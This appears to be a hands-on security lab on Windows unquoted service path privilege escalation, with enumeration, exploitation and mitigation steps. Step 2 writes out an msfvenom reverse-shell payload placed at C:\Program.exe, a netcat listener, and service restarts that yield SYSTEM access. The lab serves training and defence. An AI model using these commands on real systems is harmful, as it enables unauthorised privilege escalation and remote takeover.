Objective: Exploit unquoted service paths in Windows to execute malicious payloads with elevated privileges, and learn how to mitigate such vulnerabilities by securing service configurations.
Scenario: Unquoted service paths in Windows occur when the path to a service executable contains spaces and is not enclosed in quotes. This allows attackers to place malicious executables in locations that the system might mistakenly prioritize, leading to privilege escalation. Your task is to identify and exploit such vulnerabilities and secure the service paths.
Lab Setup
- Environment:
- A Windows system with services that may have unquoted paths.
- Tools Required:
- Command Prompt or PowerShell.
- Access to administrative privileges.
Lab Steps
Step 1: Enumerate Services and Identify Unquoted Paths
- Use the
sc qccommand to query service configurations:sc qc <service_name>- Example output:
SERVICE_NAME: VulnerableService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Vulnerable Service\service.exe - Note the
BINARY_PATH_NAME. If it contains spaces and is not enclosed in quotes, it is vulnerable.
- Example output:
- Use
wmicto list all services and identify potential issues:wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "\""- This lists services with unquoted paths that start automatically.
Step 2: Exploit the Vulnerable Service Path
- Identify potential injection points:
- For a path like
C:\Program Files\Vulnerable Service\service.exe, Windows searches for executables in the following order:C:\Program.exeC:\Program Files\Vulnerable.exeC:\Program Files\Vulnerable Service\service.exe
- For a path like
- Create a malicious executable in the highest-priority location (e.g.,
C:\Program.exe):msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f exe -o "C:\Program.exe"- Replace
<your_ip>and<your_port>with your listener’s IP address and port.
- Replace
- Restart the vulnerable service to trigger the exploit:
net stop <service_name> net start <service_name> - Set up a listener on your machine to catch the reverse shell:
nc -lvnp <your_port> - Verify the reverse shell connection.
Step 3: Verify Privilege Escalation
- Confirm that the payload executed with elevated privileges:
whoami- Expected output:
NT AUTHORITY\SYSTEM.
- Expected output:
- Document the steps used to exploit the unquoted service path.
Solution
Explanation:
- Windows services with unquoted paths allow attackers to place malicious executables in directories searched before the intended executable.
Prevention:
- Quote Service Paths:
- Edit the service configuration to enclose the path in quotes:
sc config <service_name> binPath= "C:\Program Files\Vulnerable Service\service.exe"
- Edit the service configuration to enclose the path in quotes:
- Audit Services:
- Regularly review service configurations for unquoted paths using PowerShell:
Get-WmiObject win32_service | Where-Object {$_.PathName -match ' '} | Select-Object Name, PathName
- Regularly review service configurations for unquoted paths using PowerShell:
- Restrict Permissions:
- Ensure directories along the service path are not writable by non-administrative users.
- Monitor and Log Service Activity:
- Use Windows Event Viewer to track service changes and restarts.
Testing and Verification
- Re-query the service configuration to confirm the path is enclosed in quotes.
- Attempt to exploit the service again to ensure the vulnerability has been mitigated.
- Verify that only authorized users can modify files in the service path.
Reflection
This exercise demonstrates how unquoted service paths in Windows can be exploited for privilege escalation. By identifying and mitigating these vulnerabilities, you’ve gained valuable insights into securing Windows services and preventing unauthorized access.
0 Comments